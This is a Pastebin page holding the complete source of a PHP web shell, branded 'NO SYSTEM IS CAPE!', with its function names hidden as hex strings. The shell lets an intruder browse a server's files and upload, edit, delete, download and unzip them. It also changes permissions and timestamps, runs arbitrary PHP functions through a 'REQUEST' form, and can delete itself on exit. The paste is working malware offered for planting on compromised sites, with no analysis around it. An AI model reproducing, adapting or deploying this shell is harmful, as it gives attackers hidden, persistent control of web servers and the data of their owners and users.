API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 19th, 2019
192
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.68 KB | None | 0 0
raw download clone embed print report
  1. <?php header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
  2. $Array = [
  3. '7068705f756e616d65',
  4. '70687076657273696f6e',
  5. '6368646972',
  6. '676574637764',
  7. '707265675f73706c6974',
  8. '636f7079',
  9. '66696c655f6765745f636f6e74656e7473',
  10. '6261736536345f6465636f6465',
  11. '69735f646972',
  12. '6f625f656e645f636c65616e28293b',
  13. '756e6c696e6b',
  14. '6d6b646972',
  15. '63686d6f64',
  16. '7363616e646972',
  17. '7374725f7265706c616365',
  18. '68746d6c7370656369616c6368617273',
  19. '7661725f64756d70',
  20. '666f70656e',
  21. '667772697465',
  22. '66636c6f7365',
  23. '64617465',
  24. '66696c656d74696d65',
  25. '737562737472',
  26. '737072696e7466',
  27. '66696c657065726d73',
  28. '746f756368',
  29. '66696c655f657869737473',
  30. '72656e616d65',
  31. '69735f6172726179',
  32. '69735f6f626a656374',
  33. '737472706f73',
  34. '69735f7772697461626c65',
  35. '69735f7265616461626c65',
  36. '737472746f74696d65',
  37. '66696c6573697a65',
  38. '726d646972',
  39. '6f625f6765745f636c65616e',
  40. '7265616466696c65',
  41. '617373657274',
  42. ];
  43. $___ = count($Array);
  44. for($i=0;$i<$___;$i++) {
  45. $GNJ[] = uhex($Array[$i]);
  46. }
  47. ?>
  48. <!DOCTYPE html>
  49. <html dir="auto" lang="en-US">
  50.  
  51. <head>
  52. <meta charset="UTF-8">
  53. <meta name="robots" content="NOINDEX, NOFOLLOW">
  54.  
  55. <title>NO SYSTEM IS CAPE!</title>
  56.  
  57. <link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
  58. <link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">
  59.  
  60. <script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  61. <script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
  62. </head>
  63.  
  64. <body>
  65. <header>
  66. <div class="y x">
  67. <a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
  68. MAQLO JUMPING WKwkwk
  69. </a>
  70. </div>
  71.  
  72. <div class="q x w">
  73. &#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
  74. </div>
  75.  
  76. </header>
  77.  
  78. <article>
  79. <div class="i">
  80. <i class="far fa-hdd"></i>
  81. <?php echo $GNJ[0]();?>
  82.  
  83. <br />
  84.  
  85. <i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>
  86.  
  87. <br />
  88.  
  89. <i class="far fa-folder"></i>
  90.  
  91. <?php
  92. if(isset($_GET["d"])) {
  93. $d = uhex($_GET["d"]);
  94. $GNJ[2](uhex($_GET["d"]));
  95. }
  96. else {
  97. $d = $GNJ[3]();
  98. }
  99. $k = $GNJ[4]("/(\\\|\/)/", $d );
  100. foreach ($k as $m => $l) {
  101. if($l=='' && $m==0) {
  102. echo '<a class="ajx" href="?d=2f">/</a>';
  103. }
  104. if($l == '') {
  105. continue;
  106. }
  107. echo '<a class="ajx" href="?d=';
  108. for ($i = 0; $i <= $m; $i++) {
  109. echo hex($k[$i]);
  110. if($i != $m) {
  111. echo '2f';
  112. }
  113. }
  114. echo '">'.$l.'</a>/';
  115. }
  116. ?>
  117.  
  118. <br />
  119.  
  120. </div>
  121.  
  122. <div class="u">
  123. <?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
  124. <br />
  125.  
  126. <br />
  127.  
  128. <form method="post" enctype="multipart/form-data">
  129. <label class="l w">
  130. <input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
  131. </label>&nbsp;
  132. </form>
  133.  
  134. <?php
  135. $o_ = [
  136. '<script>$.notify("',
  137. '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
  138. ];
  139. $f = $o_[0].'OK!'.$o_[1];
  140. $g = $o_[0].'ER!'.$o_[1];
  141. if(isset($_FILES["n"])) {
  142. $z = $_FILES["n"]["name"];
  143. $r = count($z);
  144. for( $i=0 ; $i < $r ; $i++ ) {
  145. if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
  146. echo $f;
  147. }
  148. else {
  149. echo $g;
  150. }
  151. }
  152. }
  153. ?>
  154.  
  155. </div>
  156. <?php
  157. $a_ = '<table cellspacing="0" cellpadding="7" width="100%">
  158. <thead>
  159. <tr>
  160. <th>';
  161. $b_ = '</th>
  162. </tr>
  163. </thead>
  164. <tbody>
  165. <tr>
  166. <td></td>
  167. </tr>
  168. <tr>
  169. <td class="x">';
  170. $c_ = '</td>
  171. </tr>
  172. </tbody>
  173. </table>';
  174. $d_ = '<br />
  175. <br />
  176. <input type="submit" class="w" value="&nbsp;OK&nbsp;" />
  177. </form>';
  178. if(isset($_GET["s"])) {
  179. echo $a_.uhex($_GET["s"]).$b_.'
  180. <textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
  181. <br />
  182. <br />
  183. <input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
  184. '.$c_;
  185. }
  186. elseif(isset($_GET["y"])) {
  187. echo $a_.'REQUEST'.$b_.'
  188. <form method="post">
  189. <input class="x" type="text" name="1" />&nbsp;&nbsp;
  190. <input class="x" type="text" name="2" />
  191. '.$d_.'
  192. <br />
  193. <textarea readonly="yes">';
  194.  
  195. if(isset($_POST["2"])) {
  196. echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
  197. }
  198.  
  199. echo '</textarea>
  200. '.$c_;
  201. }
  202. elseif(isset($_GET["e"])) {
  203. echo $a_.uhex($_GET["e"]).$b_.'
  204. <form method="post">
  205. <textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
  206. <br />
  207. <br />
  208. <span class="w">BASE64</span> :
  209. <select id="b64" name="b64">
  210. <option value="0">NO</option>
  211. <option value="1">YES</option>
  212. </select>
  213. '.$d_.'
  214. '.$c_.'
  215.  
  216. <script>
  217. $("#b64").change(function() {
  218. if($("#b64 option:selected").val() == 0) {
  219. var X = $("textarea").val();
  220. var Z = atob(X);
  221. $("textarea").val(Z);
  222. }
  223. else {
  224. var N = $("textarea").val();
  225. var I = btoa(N);
  226. $("textarea").val(I);
  227. }
  228. });
  229. </script>';
  230. if(isset($_POST["e"])) {
  231. if($_POST["b64"] == "1") {
  232. $ex = $GNJ[7]($_POST["e"]);
  233. }
  234. else {
  235. $ex = $_POST["e"];
  236. }
  237. $fp = $GNJ[17](uhex($_GET["e"]), 'w');
  238. if($GNJ[18]($fp, $ex)) {
  239. OK();
  240. }
  241. else {
  242. ER();
  243. }
  244. $GNJ[19]($fp);
  245. }
  246. }
  247. elseif(isset($_GET["x"])) {
  248. rec(uhex($_GET["x"]));
  249. if($GNJ[26](uhex($_GET["x"]))) {
  250. ER();
  251. }
  252. else {
  253. OK();
  254. }
  255.  
  256. }
  257. elseif(isset($_GET["t"])) {
  258. echo $a_.uhex($_GET["t"]).$b_.'
  259. <form action="" method="post">
  260. <input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
  261. '.$d_.'
  262. '.$c_;
  263. if( !empty($_POST["t"]) ) {
  264. $p = $GNJ[33]($_POST["t"]);
  265. if($p) {
  266. if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
  267. ER();
  268. }
  269. else {
  270. OK();
  271. }
  272. }
  273. else {
  274. ER();
  275. }
  276. }
  277. }
  278. elseif(isset($_GET["k"])) {
  279. echo $a_.uhex($_GET["k"]).$b_.'
  280. <form action="" method="post">
  281. <input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
  282. '.$d_.'
  283. '.$c_;
  284. if(!empty($_POST["b"])) {
  285. $x = $_POST["b"];
  286. $t = 0;
  287. for($i=strlen($x)-1;$i>=0;--$i)
  288. $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
  289. if(!$GNJ[12](uhex($_GET["k"]), $t)) {
  290. ER();
  291. }
  292. else {
  293. OK();
  294. }
  295. }
  296. }
  297. elseif(isset($_GET["l"])) {
  298. echo $a_.'+DIR'.$b_.'
  299. <form action="" method="post">
  300. <input name="l" class="x" type="text" value="">
  301. '.$d_.'
  302. '.$c_;
  303. if(isset($_POST["l"])) {
  304. if(!$GNJ[11]($_POST["l"])) {
  305. ER();
  306. }
  307. else {
  308. OK();
  309. }
  310. }
  311. }
  312. elseif(isset($_GET["q"])) {
  313. if($GNJ[10](__FILE__)) {
  314. $GNJ[38]($GNJ[9]);
  315. header("Location: ".basename($_SERVER['PHP_SELF'])."");
  316. exit();
  317. }
  318. else {
  319. echo $g;
  320. }
  321. }
  322. elseif(isset($_GET["n"])) {
  323. echo $a_.'+FILE'.$b_.'
  324. <form action="" method="post">
  325. <input name="n" class="x" type="text" value="">
  326. '.$d_.'
  327. '.$c_;
  328. if(isset($_POST["n"])) {
  329. if(!$GNJ[25]($_POST["n"])) {
  330. ER();
  331. }
  332. else {
  333. OK();
  334. }
  335. }
  336. }
  337. elseif(isset($_GET["r"])) {
  338. echo $a_.uhex($_GET["r"]).$b_.'
  339. <form action="" method="post">
  340. <input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
  341. '.$d_.'
  342. '.$c_;
  343. if(isset($_POST["r"])) {
  344. if($GNJ[26]($_POST["r"])) {
  345. ER();
  346. }
  347. else {
  348. if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
  349. OK();
  350. }
  351. else {
  352. ER();
  353. }
  354. }
  355. }
  356. }
  357. elseif(isset($_GET["z"])) {
  358. $zip = new ZipArchive;
  359. $res = $zip->open(uhex($_GET["z"]));
  360. if($res === TRUE) {
  361. $zip->extractTo(uhex($_GET["d"]));
  362. $zip->close();
  363. OK();
  364. } else {
  365. ER();
  366. }
  367. }
  368. else {
  369. echo '<table cellspacing="0" cellpadding="7" width="100%">
  370. <thead>
  371. <tr>
  372. <th width="44%">[ NAME ]</th>
  373. <th width="11%">[ SIZE ]</th>
  374. <th width="17%">[ PERM ]</th>
  375. <th width="17%">[ DATE ]</th>
  376. <th width="11%">[ ACT ]</th>
  377. </tr>
  378. </thead>
  379. <tbody>
  380. <tr>
  381. <td>
  382. <a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
  383. <a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
  384. </td>
  385. </tr>
  386. ';
  387.  
  388. $h = "";
  389. $j = "";
  390. $w = $GNJ[13]($d);
  391. if($GNJ[28]($w) || $GNJ[29]($w)) {
  392. foreach($w as $c){
  393. $e = $GNJ[14]("\\", "/", $d);
  394. if(!$GNJ[30]($c, ".zip")) {
  395. $zi = '';
  396. }
  397. else {
  398. $zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
  399. }
  400. if($GNJ[31]("$d/$c")) {
  401. $o = "";
  402. }
  403. elseif(!$GNJ[32]("$d/$c")) {
  404. $o = " h";
  405. }
  406. else {
  407. $o = " w";
  408. }
  409. $s = $GNJ[34]("$d/$c") / 1024;
  410. $s = round($s, 3);
  411. if($s>=1024) {
  412. $s = round($s/1024, 2) . " MB";
  413. } else {
  414. $s = $s . " KB";
  415. }
  416. if(($c != ".") && ($c != "..")){
  417. ($GNJ[8]("$d/$c")) ?
  418. $h .= '<tr class="r">
  419. <td>
  420. <i class="far fa-folder m"></i>
  421. <a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
  422. </td>
  423. <td class="x">
  424. dir
  425. </td>
  426. <td class="x">
  427. <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
  428. </td>
  429. <td class="x">
  430. <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
  431. </td>
  432. <td class="x">
  433. <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
  434. <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
  435. </td>
  436. </tr>
  437.  
  438. '
  439. :
  440. $j .= '<tr class="r">
  441. <td>
  442. <i class="far fa-file m"></i>&thinsp;
  443. <a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
  444. </td>
  445. <td class="x">
  446. '.$s.'
  447. </td>
  448. <td class="x">
  449. <a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
  450. </td>
  451. <td class="x">
  452. <a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
  453. </td>
  454. <td class="x">
  455. <a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
  456. <a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
  457. <a href="?d='.hex($e).'&g='.hex($c).'">G</a>
  458. '.$zi.'
  459. <a href="?d='.hex($e).'&x='.hex($c).'">D</a>
  460. </td>
  461. </tr>
  462.  
  463. ';
  464.  
  465. }
  466. }
  467. }
  468.  
  469. echo $h;
  470. echo $j;
  471. echo '</tbody>
  472. <tfoot>
  473. <tr>
  474. <th class="et">
  475. <a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
  476. <a href="?d='.hex($e).'&q">EXIT</a>
  477. </th>
  478. <th class="et" width="11%"></th>
  479. <th class="et" width="17%"></th>
  480. <th class="et" width="17%"></th>
  481. <th class="et" width="11%"></th>
  482. </tr>
  483. </tfoot>
  484. </table>';
  485. }
  486. ?>
  487.  
  488. </article>
  489. <footer class="x">
  490. &copy;TheAlmightyZeus
  491. </footer>
  492. <?php
  493. if(isset($_GET["1"])) {
  494. echo $f;
  495. }
  496. elseif(isset($_GET["0"])) {
  497. echo $g;
  498. }
  499. else {
  500. NULL;
  501. }
  502. ?>
  503.  
  504. <script>
  505. $(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
  506. </script>
  507. </body>
  508. </html>
  509. <?php
  510. function rec($j) {
  511. global $GNJ;
  512. if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
  513. return;
  514. }
  515. if($GNJ[8]($j)) {
  516. array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
  517. $GNJ[35]($j);
  518. }
  519. else {
  520. $GNJ[10]($j);
  521. }
  522. }
  523. function dre($y1, $y2) {
  524. global $GNJ;
  525. ob_start();
  526. $GNJ[16]($y1($y2));
  527. return $GNJ[36]();
  528. }
  529. function hex($n) {
  530. $y='';
  531. for ($i=0; $i < strlen($n); $i++){
  532. $y .= dechex(ord($n[$i]));
  533. }
  534. return $y;
  535. }
  536. function uhex($y) {
  537. $n='';
  538. for ($i=0; $i < strlen($y)-1; $i+=2){
  539. $n .= chr(hexdec($y[$i].$y[$i+1]));
  540. }
  541. return $n;
  542. }
  543. function OK() {
  544. global $GNJ, $d;
  545. $GNJ[38]($GNJ[9]);
  546. header("Location: ?d=".hex($d)."&1");
  547. exit();
  548. }
  549. function ER() {
  550. global $GNJ, $d;
  551. $GNJ[38]($GNJ[9]);
  552. header("Location: ?d=".hex($d)."&0");
  553. exit();
  554. }
  555. function x($c) {
  556. global $GNJ;
  557. $x = $GNJ[24]($c);
  558. if(($x & 0xC000) == 0xC000) {
  559. $u = "s";
  560. }
  561. elseif(($x & 0xA000) == 0xA000) {
  562. $u = "l";
  563. }
  564. elseif(($x & 0x8000) == 0x8000) {
  565. $u = "-";
  566. }
  567. elseif(($x & 0x6000) == 0x6000) {
  568. $u = "b";
  569. }
  570. elseif(($x & 0x4000) == 0x4000) {
  571. $u = "d";
  572. }
  573. elseif(($x & 0x2000) == 0x2000) {
  574. $u = "c";
  575. }
  576. elseif(($x & 0x1000) == 0x1000) {
  577. $u = "p";
  578. }
  579. else {
  580. $u = "u";
  581. }
  582. $u .= (($x & 0x0100) ? "r" : "-");
  583. $u .= (($x & 0x0080) ? "w" : "-");
  584. $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
  585. $u .= (($x & 0x0020) ? "r" : "-");
  586. $u .= (($x & 0x0010) ? "w" : "-");
  587. $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
  588. $u .= (($x & 0x0004) ? "r" : "-");
  589. $u .= (($x & 0x0002) ? "w" : "-");
  590. $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
  591. return $u;
  592. }
  593. if(isset($_GET["g"])) {
  594. $GNJ[38]($GNJ[9]);
  595. header("Content-Type: application/octet-stream");
  596. header("Content-Transfer-Encoding: Binary");
  597. header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
  598. header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
  599. $GNJ[37](uhex($_GET["g"]));
  600. }
  601. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!